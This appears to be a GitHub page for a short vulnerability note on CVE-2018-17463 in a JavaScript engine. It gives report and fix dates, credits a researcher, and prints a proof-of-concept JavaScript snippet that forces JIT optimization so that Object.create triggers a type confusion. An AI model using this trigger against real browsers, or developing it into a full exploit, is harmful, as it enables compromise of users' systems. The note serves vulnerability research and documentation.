Skip to content

Latest commit

 

History

History
25 lines (19 loc) · 392 Bytes

CVE-2018-17463.md

File metadata and controls

25 lines (19 loc) · 392 Bytes
Raw

CVE-2018-17463

  • Report: Sep 2018
  • Fix: Oct 2018
  • Credit: Samuel Gross

PoC

function f(o) {
  o.x;
  Object.create(o);
  return o.y.a;
}

f({ x : 0, y : { a : 1 } });
f({ x : 0, y : { a : 2 } });
for (let i = 0; i < 100000; i++) // Optimize
  f({ x : 0, y : { a : 3 } });
console.log(f({ x : 0, y : { a : 3 } }));

Reference